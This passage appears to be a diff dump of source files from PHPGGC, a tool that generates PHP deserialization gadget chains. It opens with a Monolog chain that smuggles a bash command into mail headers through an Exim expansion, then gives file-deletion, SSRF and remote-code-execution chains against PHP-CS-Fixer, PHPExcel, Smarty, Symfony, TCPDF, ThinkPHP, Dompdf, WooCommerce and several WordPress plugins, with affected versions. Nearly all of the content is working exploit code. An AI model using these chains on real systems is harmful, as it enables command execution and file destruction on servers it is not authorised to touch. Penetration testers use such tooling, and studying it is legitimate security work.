22 | public function __construct($buffer) | |
23 | { | |
24 | $this->bufferSize = 2; | |
25 | $this->handler = $buffer; | |
26 | $this->buffer = [0 => array("level" => 100, | |
27 | "message" => 1, | |
28 | "context" => [], | |
29 | "extra" => [], | |
30 | "channel" => 1)]; | |
31 | } | |
32 | } | |
33 | ||
34 | class NativeMailerHandler | |
35 | { | |
36 | protected $level; | |
37 | protected $processors; | |
38 | protected $formatter; | |
39 | protected $maxColumnWidth; | |
40 | protected $parameters; | |
41 | protected $to; | |
42 | protected $headers; | |
43 | ||
44 | public function __construct($command) | |
45 | { | |
46 | $this->level = 1; | |
47 | $this->processors = ["array_reverse"]; | |
48 | // if $this->buffer[0] is carefully crafted | |
49 | // $this->format can be used to pass a payload through the 'body' parameter | |
50 | // via the LineFormatter | |
51 | // Here we used the headers param to pass the payload | |
52 | $this->formatter = new \Monolog\Formatter\LineFormatter(); | |
53 | $this->maxColumnWidth = 20; | |
54 | $this->parameters = ["-be"]; | |
55 | $this->headers = ['${run{/bin/bash -c "'.$command.'"}{yes}{no}}']; | |
56 | $this->to = ["init@localhost"]; | |
57 | } | |
58 | } | |
59 | } | |
60 | ||
61 | namespace Monolog\Formatter | |
62 | { | |
63 | class LineFormatter | |
64 | { | |
65 | protected $format; | |
66 | public function __construct() | |
67 | { | |
68 | $this->format = ""; | |
69 | } | |
70 | } | |
71 | } | |
72 |
0 | <?php | |
1 | namespace GadgetChain\PHPCSFixer; | |
2 | ||
3 | class FD1 extends \PHPGGC\GadgetChain\FileDelete | |
4 | { | |
5 | public static $version = '<= 2.17.3'; | |
6 | public static $vector = '__destruct'; | |
7 | public static $author = 'snoopysecurity'; | |
8 | ||
9 | public function generate(array $parameters) | |
10 | { | |
11 | $remote_file = $parameters["remote_file"]; | |
12 | ||
13 | return new \PhpCsFixer\FileRemoval($remote_file); | |
14 | } | |
15 | } | |
16 |
0 | <?php | |
1 | ||
2 | namespace PhpCsFixer | |
3 | { | |
4 | //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/FileRemoval.php | |
5 | class FileRemoval | |
6 | { | |
7 | ||
8 | function __construct($remote_file) | |
9 | { | |
10 | $this->files = [$remote_file => $remote_file]; | |
11 | ||
12 | } | |
13 | ||
14 | } | |
15 | } | |
16 | ||
17 | /* | |
18 | public function __destruct() | |
19 | { | |
20 | $this->clean(); | |
21 | } | |
22 | ||
23 | ||
24 | ||
25 | ||
26 | public function clean() | |
27 | { | |
28 | foreach ($this->files as $file => $value) { | |
29 | $this->unlink($file); | |
30 | } | |
31 | $this->files = []; | |
32 | } | |
33 | ||
34 | private function unlink($path) | |
35 | { | |
36 | @unlink($path); | |
37 | } | |
38 | } | |
39 | */ | |
40 | ||
41 | ||
42 | ?> |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\PHPCSFixer; | |
3 | ||
4 | class FD2 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '<= 2.17.3'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'snoopysecurity'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | $remote_file = $parameters["remote_file"]; | |
13 | ||
14 | return new \PhpCsFixer\Linter\ProcessLinter($remote_file); | |
15 | } | |
16 | }⏎ |
0 | <?php | |
1 | namespace PhpCsFixer\Linter | |
2 | { | |
3 | //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/Linter/ProcessLinter.php | |
4 | class ProcessLinter | |
5 | { | |
6 | ||
7 | function __construct($remote_file) | |
8 | { | |
9 | $this->temporaryFile = $remote_file; | |
10 | $this->fileRemoval = new \PhpCsFixer\FileRemoval(); | |
11 | ||
12 | } | |
13 | ||
14 | /* | |
15 | public function __destruct() | |
16 | { | |
17 | if (null !== $this->temporaryFile) { | |
18 | $this->fileRemoval->delete($this->temporaryFile); | |
19 | } | |
20 | } | |
21 | */ | |
22 | ||
23 | } | |
24 | } | |
25 | ||
26 | namespace PhpCsFixer | |
27 | { | |
28 | ||
29 | //https://github.com/FriendsOfPHP/PHP-CS-Fixer/blob/v2.17.3/src/FileRemoval.php | |
30 | class FileRemoval | |
31 | ||
32 | { | |
33 | ||
34 | public function delete($path) | |
35 | { | |
36 | if (isset($this->files[$path])) | |
37 | { | |
38 | unset($this->files[$path]); | |
39 | } | |
40 | $this->unlink($path); | |
41 | } | |
42 | private function unlink($path) | |
43 | { | |
44 | @unlink($path); | |
45 | } | |
46 | ||
47 | } | |
48 | } | |
49 | ||
50 | /* | |
51 | public function delete($path) | |
52 | { | |
53 | if (isset($this->files[$path])) { | |
54 | unset($this->files[$path]); | |
55 | } | |
56 | $this->unlink($path); | |
57 | } | |
58 | ||
59 | */ | |
60 | ||
61 | ?> |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\PHPExcel; | |
3 | ||
4 | class FD1 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '1.8.2+'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | return new \PHPExcel_CachedObjectStorage_DiscISAM($parameters['remote_file']); | |
13 | } | |
14 | }⏎ |
0 | <?php | |
1 | ||
2 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php | |
3 | class PHPExcel_CachedObjectStorage_DiscISAM { | |
4 | private $fileName = null; | |
5 | private $fileHandle = 42; | |
6 | ||
7 | public function __construct($filePath) { | |
8 | $this->fileName = $filePath; | |
9 | } | |
10 | ||
11 | /* | |
12 | public function __destruct() { | |
13 | if (!is_null($this->fileHandle)) { | |
14 | fclose($this->fileHandle); // Will only produce a warning | |
15 | unlink($this->fileName); | |
16 | } | |
17 | $this->fileHandle = null; | |
18 | } | |
19 | */ | |
20 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\PHPExcel; | |
3 | ||
4 | class FD2 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '<= 1.8.1'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | return new \PHPExcel_CachedObjectStorage_DiscISAM($parameters['remote_file']); | |
13 | } | |
14 | }⏎ |
0 | <?php | |
1 | ||
2 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/CachedObjectStorage/DiscISAM.php | |
3 | class PHPExcel_CachedObjectStorage_DiscISAM { | |
4 | private $_fileName = null; | |
5 | private $_fileHandle = 42; | |
6 | ||
7 | public function __construct($filePath) { | |
8 | $this->_fileName = $filePath; | |
9 | } | |
10 | ||
11 | /* | |
12 | public function __destruct() { | |
13 | if (!is_null($this->_fileHandle)) { | |
14 | fclose($this->_fileHandle); // Will only produce a warning | |
15 | unlink($this->_fileName); | |
16 | } | |
17 | $this->_fileHandle = null; | |
18 | } // function __destruct() | |
19 | */ | |
20 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\PHPExcel; | |
3 | ||
4 | class FD3 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '1.8.2+'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | return new \PHPExcel_Shared_XMLWriter($parameters['remote_file']); | |
13 | } | |
14 | }⏎ |
0 | <?php | |
1 | ||
2 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.2/Classes/PHPExcel/Shared/XMLWriter.php | |
3 | class PHPExcel_Shared_XMLWriter { | |
4 | private $tempFileName = ''; | |
5 | ||
6 | public function __construct($filePath) { | |
7 | $this->tempFileName = $filePath; | |
8 | } | |
9 | ||
10 | /* | |
11 | public function __destruct() | |
12 | { | |
13 | // Unlink temporary files | |
14 | if ($this->tempFileName != '') { | |
15 | @unlink($this->tempFileName); | |
16 | } | |
17 | } | |
18 | */ | |
19 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\PHPExcel; | |
3 | ||
4 | class FD4 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '<= 1.8.1'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | ||
10 | public function generate(array $parameters) | |
11 | { | |
12 | return new \PHPExcel_Shared_XMLWriter($parameters['remote_file']); | |
13 | } | |
14 | }⏎ |
0 | <?php | |
1 | ||
2 | # https://github.com/PHPOffice/PHPExcel/blob/1.8.1/Classes/PHPExcel/Shared/XMLWriter.php | |
3 | class PHPExcel_Shared_XMLWriter { | |
4 | private $_tempFileName = ''; | |
5 | ||
6 | public function __construct($filePath) { | |
7 | $this->_tempFileName = $filePath; | |
8 | } | |
9 | ||
10 | /* | |
11 | public function __destruct() | |
12 | { | |
13 | // Unlink temporary files | |
14 | if ($this->_tempFileName != '') { | |
15 | @unlink($this->_tempFileName); | |
16 | } | |
17 | } | |
18 | */ | |
19 | }⏎ |
6 | 6 | public static $version = '<= 1.2.2'; |
7 | 7 | public static $vector = '__wakeup'; |
8 | 8 | public static $author = 'Raz0r'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | This chain does not expect parameters, will eval() any code supplied in |
11 | 11 | php://input (i.e. POST data). Requires allow_url_include = true. |
12 | 12 | '; |
0 | 0 | <?php |
1 | 1 | |
2 | namespace Phalcon\Di{ | |
2 | namespace Phalcon\Di { | |
3 | 3 | class Service { |
4 | 4 | protected $_shared; |
5 | 5 | protected $_definition; |
69 | 69 | } |
70 | 70 | } |
71 | 71 | |
72 | ?> |
1 | 1 | |
2 | 2 | namespace GadgetChain\Pydio\Guzzle; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '< 8.2.2'; |
7 | 7 | public static $vector = '__toString'; |
1 | 1 | |
2 | 2 | namespace GadgetChain\Slim; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '3.8.1'; |
7 | 7 | public static $vector = '__toString'; |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\Smarty; | |
3 | ||
4 | class FD1 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '?'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'd3adc0de'; | |
9 | public static $parameters = [ | |
10 | 'remote_file' | |
11 | ]; | |
12 | ||
13 | public function generate(array $parameters) | |
14 | { | |
15 | return new \Smarty_Internal_Template($parameters['remote_file']); | |
16 | } | |
17 | }⏎ |
0 | <?php | |
1 | ||
2 | abstract class Smarty_CacheResource | |
3 | { | |
4 | } | |
5 | ||
6 | class Smarty_Internal_CacheResource_File extends Smarty_CacheResource | |
7 | { | |
8 | public function releaseLock(Smarty $smarty, Smarty_Template_Cached $cached) | |
9 | { | |
10 | $cached->is_locked = false; | |
11 | unlink($cached->lock_id); | |
12 | } | |
13 | } | |
14 | ||
15 | class Smarty_Template_Cached | |
16 | { | |
17 | public $lock_id = null; | |
18 | public $is_locked = true; | |
19 | ||
20 | public function __construct() | |
21 | { | |
22 | $this->handler = new Smarty_Internal_CacheResource_File(); | |
23 | $this->lock_id = ''; | |
24 | } | |
25 | ||
26 | public function setlock($lock_id){ | |
27 | if($lock_id){ | |
28 | $this->lock_id = $lock_id; | |
29 | } | |
30 | } | |
31 | } | |
32 | ||
33 | class Smarty_Internal_TemplateBase | |
34 | { | |
35 | } | |
36 | ||
37 | class Smarty extends Smarty_Internal_TemplateBase | |
38 | { | |
39 | public $cache_locking = true; | |
40 | public $cache_dir; | |
41 | public $use_sub_dirs; | |
42 | public function __construct(){ | |
43 | $this->cache_locking = 1; | |
44 | $this->cache_dir = "/"; | |
45 | $this->use_sub_dirs = true; | |
46 | $this->cache = true; | |
47 | } | |
48 | } | |
49 | ||
50 | class Smarty_Internal_Template extends Smarty_Internal_TemplateBase | |
51 | { | |
52 | ||
53 | public $cached; | |
54 | public $smarty; | |
55 | ||
56 | public function __construct($lock_id){ | |
57 | $this->smarty = new Smarty(); | |
58 | $this->cached = new Smarty_Template_Cached(); | |
59 | $this->setlock($lock_id); | |
60 | } | |
61 | ||
62 | public function setlock($lock_id){ | |
63 | $this->cached->setlock($lock_id); | |
64 | } | |
65 | ||
66 | } | |
67 | ||
68 | ?> |
0 | <?php | |
1 | namespace GadgetChain\Smarty; | |
2 | ||
3 | class SSRF1 extends \PHPGGC\GadgetChain\SSRF | |
4 | { | |
5 | public static $version = '?'; | |
6 | public static $vector = '__destruct'; | |
7 | public static $foundby = 'unknown'; | |
8 | public static $author = 'mr_me'; | |
9 | public static $information = ' | |
10 | Reference: https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Positive-Research-2014-eng.pdf (2014). | |
11 | This was originally an XXE gadget chain, but it does not work on recent PHP versions. | |
12 | Therefore, the gadget chain is now just an SSRF. | |
13 | According to raz0r, it "works only in PHP <5.4.12/5.3.22". | |
14 | '; | |
15 | ||
16 | public function generate(array $parameters) | |
17 | { | |
18 | return new \Smarty_Internal_Template($parameters['uri']); | |
19 | } | |
20 | } | |
21 | ?> |
0 | <?php | |
1 | class Smarty_Template_Cached | |
2 | { | |
3 | public $is_locked = true; | |
4 | public function __construct($url) | |
5 | { | |
6 | $res = parse_url($url); | |
7 | $this->handler = new SoapClient(null, [ | |
8 | 'uri' => $res['scheme'] . '://' . $res['host'] . '/', | |
9 | 'location' => $url | |
10 | ]); | |
11 | } | |
12 | } | |
13 | ||
14 | class Smarty | |
15 | { | |
16 | public $cache_locking = true; | |
17 | } | |
18 | ||
19 | class Smarty_Internal_Template | |
20 | { | |
21 | public $cached; | |
22 | public $smarty; | |
23 | ||
24 | public function __construct($url) | |
25 | { | |
26 | $this->smarty = new Smarty(); | |
27 | $this->cached = new Smarty_Template_Cached($url); | |
28 | } | |
29 | } | |
30 | ?> |
6 | 6 | public static $version = '2.5.2'; |
7 | 7 | public static $vector = 'DebugImport'; |
8 | 8 | public static $author = 'cf'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | This chain is supposed to be uploaded through the /_profiler/import |
11 | 11 | page. It will produce an error but the file will be created in the |
12 | 12 | webroot. |
1 | 1 | |
2 | 2 | namespace GadgetChain\Symfony; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\Command | |
5 | 5 | { |
6 | 6 | public static $version = '3.3'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'cf'; |
9 | public static $informations = 'Executes given command through proc_open()'; | |
10 | public static $parameters = [ | |
11 | 'command' | |
12 | ]; | |
9 | public static $information = 'Executes given command through proc_open()'; | |
13 | 10 | |
14 | 11 | public function generate(array $parameters) |
15 | 12 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\Symfony; |
3 | 3 | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | 5 | { |
6 | 6 | public static $version = '2.3.42 < 2.6'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'crlf'; |
9 | public static $informations = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )'; | |
10 | public static $parameters = [ | |
11 | 'code' | |
12 | ]; | |
9 | public static $information = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )'; | |
13 | 10 | |
14 | 11 | public function generate(array $parameters) |
15 | 12 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\Symfony; |
3 | 3 | |
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE3 extends \PHPGGC\GadgetChain\RCE\PHPCode | |
5 | 5 | { |
6 | 6 | public static $version = '2.6 <= 2.8.32'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'crlf'; |
9 | public static $informations = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )'; | |
10 | public static $parameters = [ | |
11 | 'code' | |
12 | ]; | |
9 | public static $information = 'Executes through eval() ( <?php \'.$code.\';die(); ?> )'; | |
13 | 10 | |
14 | 11 | public function generate(array $parameters) |
15 | 12 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\Symfony; |
3 | 3 | |
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE4 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '3.4.0-34, 4.2.0-11, 4.3.0-7'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'wisdomtree'; |
9 | public static $informations = 'Execute $function with $parameter (CVE-2019-18889)'; | |
9 | public static $information = 'Execute $function with $parameter (CVE-2019-18889)'; | |
10 | 10 | public static $parameters = [ |
11 | 11 | 'function', |
12 | 12 | 'parameter' |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\TCPDF; | |
3 | ||
4 | class FD1 extends \PHPGGC\GadgetChain\FileDelete | |
5 | { | |
6 | public static $version = '<= 6.3.5'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'timoles'; | |
9 | public static $information = ' | |
10 | TCPDF contains the variable "imagekeys" which expects an array of strings. Upon __destruct an "unlink()" is | |
11 | called on all filepaths within the imagekeys array. | |
12 | '; | |
13 | ||
14 | public function generate(array $parameters) | |
15 | { | |
16 | $file = $parameters['remote_file']; | |
17 | ||
18 | return new \TCPDF( | |
19 | $file | |
20 | ); | |
21 | } | |
22 | } |
0 | <?php | |
1 | ||
2 | class TCPDF { | |
3 | protected $imagekeys; | |
4 | ||
5 | function __construct($remote_file) { | |
6 | $this->imagekeys = [ | |
7 | $remote_file | |
8 | ]; | |
9 | } | |
10 | } |
1 | 1 | |
2 | 2 | namespace GadgetChain\ThinkPHP; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | 6 | public static $version = '5.1.x-5.2.x'; |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'Smi1e'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | This chain can only execute system(). |
11 | 11 | Because the second parameter is uncontrollable |
12 | 12 | '; |
13 | ||
13 | 14 | public function generate(array $parameters) |
14 | 15 | { |
15 | 16 | $function = $parameters['function']; |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\Dompdf; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '0.8.5+ & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = ' | |
10 | Tested up to WP 5.4.1 and Dompdf 0.8.5. Newest versions might also work. | |
11 | Example of plugins using this library: | |
12 | woocommerce-pdf-invoices-packing-slips (lib only included when a PDF is output) | |
13 | advanced-cf7-db (lib only included when PDF generated) | |
14 | '; | |
15 | ||
16 | public function generate(array $parameters) | |
17 | { | |
18 | $function = $parameters['function']; | |
19 | $parameter = $parameters['parameter']; | |
20 | ||
21 | return new \Dompdf\Adapter\CPDF( | |
22 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
23 | ); | |
24 | } | |
25 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace | |
3 | { | |
4 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
5 | } | |
6 | ||
7 | namespace Dompdf\Adapter | |
8 | { | |
9 | // https://github.com/dompdf/dompdf/blob/master/src/Adapter/CPDF.php | |
10 | class CPDF | |
11 | { | |
12 | // Since 0.8.5, this attribute is protected (was private before) | |
13 | protected $_image_cache; | |
14 | ||
15 | // Custom contrustor to set the payload | |
16 | public function __construct($image_cache) | |
17 | { | |
18 | $this->_image_cache = $image_cache; | |
19 | } | |
20 | ||
21 | /* | |
22 | public function __destruct() | |
23 | { | |
24 | foreach ($this->_image_cache as $img) { | |
25 | // The file might be already deleted by 3rd party tmp cleaner, | |
26 | // the file might not have been created at all | |
27 | // (if image outputting commands failed) | |
28 | // or because the destructor was called twice accidentally. | |
29 | if (!file_exists($img)) { | |
30 | continue; | |
31 | } | |
32 | ||
33 | if ($this->_dompdf->getOptions()->getDebugPng()) { | |
34 | print '[__destruct unlink ' . $img . ']'; | |
35 | } | |
36 | if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) { | |
37 | unlink($img); | |
38 | } | |
39 | } | |
40 | } | |
41 | */ | |
42 | } | |
43 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\Dompdf; | |
3 | ||
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '0.7.0 <= 0.8.4 & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = ' | |
10 | Tested up to WP 5.4.1 and Dompdf 0.8.4. | |
11 | Example of plugins using this library: | |
12 | woocommerce-pdf-invoices-packing-slips (lib only included when a PDF is output) | |
13 | advanced-cf7-db (lib only included when PDF generated) | |
14 | '; | |
15 | ||
16 | public function generate(array $parameters) | |
17 | { | |
18 | $function = $parameters['function']; | |
19 | $parameter = $parameters['parameter']; | |
20 | ||
21 | return new \Dompdf\Adapter\CPDF( | |
22 | new \Requests_Utility_FilteredIterator([$parameter], $function) | |
23 | ); | |
24 | } | |
25 | }⏎ |
0 | <?php | |
1 | ||
2 | namespace | |
3 | { | |
4 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
5 | } | |
6 | ||
7 | namespace Dompdf\Adapter | |
8 | { | |
9 | // https://github.com/dompdf/dompdf/blob/v0.8.4/src/Adapter/CPDF.php | |
10 | class CPDF | |
11 | { | |
12 | private $_image_cache; | |
13 | ||
14 | // Custom contrustor to set the payload | |
15 | public function __construct($image_cache) | |
16 | { | |
17 | $this->_image_cache = $image_cache; | |
18 | } | |
19 | ||
20 | /* | |
21 | public function __destruct() | |
22 | { | |
23 | foreach ($this->_image_cache as $img) { | |
24 | // The file might be already deleted by 3rd party tmp cleaner, | |
25 | // the file might not have been created at all | |
26 | // (if image outputting commands failed) | |
27 | // or because the destructor was called twice accidentally. | |
28 | if (!file_exists($img)) { | |
29 | continue; | |
30 | } | |
31 | ||
32 | if ($this->_dompdf->getOptions()->getDebugPng()) { | |
33 | print '[__destruct unlink ' . $img . ']'; | |
34 | } | |
35 | if (!$this->_dompdf->getOptions()->getDebugKeepTemp()) { | |
36 | unlink($img); | |
37 | } | |
38 | } | |
39 | } | |
40 | */ | |
41 | } | |
42 | }⏎ |
1 | 1 | |
2 | 2 | namespace GadgetChain\WordPress\Guzzle; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '4.0.0 <= 6.4.1+'; | |
6 | public static $version = '4.0.0 <= 6.4.1+ & WP < 5.5.2'; | |
7 | 7 | public static $vector = '__toString'; |
8 | 8 | public static $author = 'erwan_lr'; |
9 | public static $informations = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.'; | |
9 | public static $information = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.'; | |
10 | 10 | |
11 | 11 | public function generate(array $parameters) |
12 | 12 | { |
1 | 1 | |
2 | 2 | namespace GadgetChain\WordPress\Guzzle; |
3 | 3 | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '4.0.0 <= 6.4.1+'; | |
6 | public static $version = '4.0.0 <= 6.4.1+ & WP < 5.5.2'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'Kevinlpd'; |
9 | public static $informations = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.'; | |
9 | public static $information = 'Tested up to WP 5.2.4 and Guzzle 6.4.1. Newest versions might also work.'; | |
10 | 10 | |
11 | 11 | public function generate(array $parameters) |
12 | 12 | { |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\P\EmailSubscribers; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '4.0 <= 4.4.7+ & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.4.1 and EmailSubscribers 4.4.7. Newest versions might also work.'; | |
10 | ||
11 | public function generate(array $parameters) | |
12 | { | |
13 | $function = $parameters['function']; | |
14 | $parameter = $parameters['parameter']; | |
15 | ||
16 | return new \IG_Log_Handler_File(new \Requests_Utility_FilteredIterator([$parameter], $function)); | |
17 | } | |
18 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | // EmailSubsribers - https://plugins.svn.wordpress.org/email-subscribers/trunk/lite/includes/logs/log-handlers/class-ig-log-handler-file.php | |
5 | class IG_Log_Handler_File { | |
6 | protected $handles = array(); | |
7 | ||
8 | // Custom constructor to set the $handles more easily | |
9 | public function __construct($handles) { | |
10 | $this->handles = $handles; | |
11 | } | |
12 | ||
13 | /* | |
14 | public function __destruct() { | |
15 | foreach ( $this->handles as $handle ) { | |
16 | if ( is_resource( $handle ) ) { | |
17 | fclose( $handle ); // @codingStandardsIgnoreLine. | |
18 | } | |
19 | } | |
20 | } | |
21 | */ | |
22 | } |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\P\EverestForms; | |
3 | ||
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '1.0 <= 1.6.7+ & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'erwan_lr'; | |
9 | public static $information = 'Tested up to WP 5.4.1 and EverestForms 1.6.7. Newest versions might also work. | |
10 | '; | |
11 | ||
12 | public function generate(array $parameters) | |
13 | { | |
14 | $function = $parameters['function']; | |
15 | $parameter = $parameters['parameter']; | |
16 | ||
17 | return new \EVF_Log_Handler_File(new \Requests_Utility_FilteredIterator([$parameter], $function)); | |
18 | } | |
19 | }⏎ |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | // EverestForms - https://plugins.svn.wordpress.org/everest-forms/trunk/includes/log-handlers/class-evf-log-handler-file.php | |
5 | class EVF_Log_Handler_File { | |
6 | protected $handles = array(); | |
7 | ||
8 | // Custom constructor to set the $handles more easily | |
9 | public function __construct($handles) { | |
10 | $this->handles = $handles; | |
11 | } | |
12 | ||
13 | /* | |
14 | public function __destruct() { | |
15 | foreach ( $this->handles as $handle ) { | |
16 | if ( is_resource( $handle ) ) { | |
17 | fclose( $handle ); // phpcs:ignore WordPress.WP.AlternativeFunctions.file_system_read_fclose | |
18 | } | |
19 | } | |
20 | } | |
21 | */ | |
22 | } |
1 | 1 | |
2 | 2 | namespace GadgetChain\WordPress\P\WooCommerce; |
3 | 3 | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE | |
4 | class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | 5 | { |
6 | public static $version = '3.4.0 <= 3.6.2+'; | |
6 | public static $version = '3.4.0 <= 4.1.0+ & WP < 5.5.2'; | |
7 | 7 | public static $vector = '__destruct'; |
8 | 8 | public static $author = 'erwan_lr'; |
9 | public static $informations = ' | |
9 | public static $information = ' | |
10 | 10 | Demonstrated at BSide Manchester: https://www.youtube.com/watch?v=GePBmsNJw6Y&t=1763 |
11 | Tested up to WP 5.2 and WooCommerce 3.6.2 activated (but not configured). Newest versions might also work. | |
11 | Tested up to WP 5.4.1 and WooCommerce 4.1.0 activated (but not configured). Newest versions might also work. | |
12 | 12 | '; |
13 | 13 | |
14 | 14 | public function generate(array $parameters) |
0 | <?php | |
1 | ||
2 | namespace GadgetChain\WordPress\P\WooCommerce; | |
3 | ||
4 | class RCE2 extends \PHPGGC\GadgetChain\RCE\FunctionCall | |
5 | { | |
6 | public static $version = '<= 3.4.0 & WP < 5.5.2'; | |
7 | public static $vector = '__destruct'; | |
8 | public static $author = 'Vincent Ulitzsch(@vinulium) and Pascal Zenker (@parzel2), based on WooCommerce RCE by erwan_lr'; | |
9 | public static $information = ' | |
10 | Simple adaption of the gadgetchain demonstrated at BSide Manchester: https://www.youtube.com/watch?v=GePBmsNJw6Y&t=1763. | |
11 | Original chain by erwan_lr. | |
12 | Tested up to WP 5.1.1 and WooCommerce 3.4.0 activated (but not configured). | |
13 | '; | |
14 | ||
15 | public function generate(array $parameters) | |
16 | { | |
17 | $function = $parameters['function']; | |
18 | $parameter = $parameters['parameter']; | |
19 | ||
20 | return new \WC_Logger(new \Requests_Utility_FilteredIterator([$parameter], $function)); | |
21 | } | |
22 | } |
0 | <?php | |
1 | ||
2 | require_once(DIR_GADGETCHAINS . '/WordPress/generic/gadgets.php'); | |
3 | ||
4 | // WooCommerce - https://plugins.trac.wordpress.org/browser/woocommerce/trunk/includes/log-handlers/class-wc-log-handler-file.php | |
5 | class WC_Logger | |
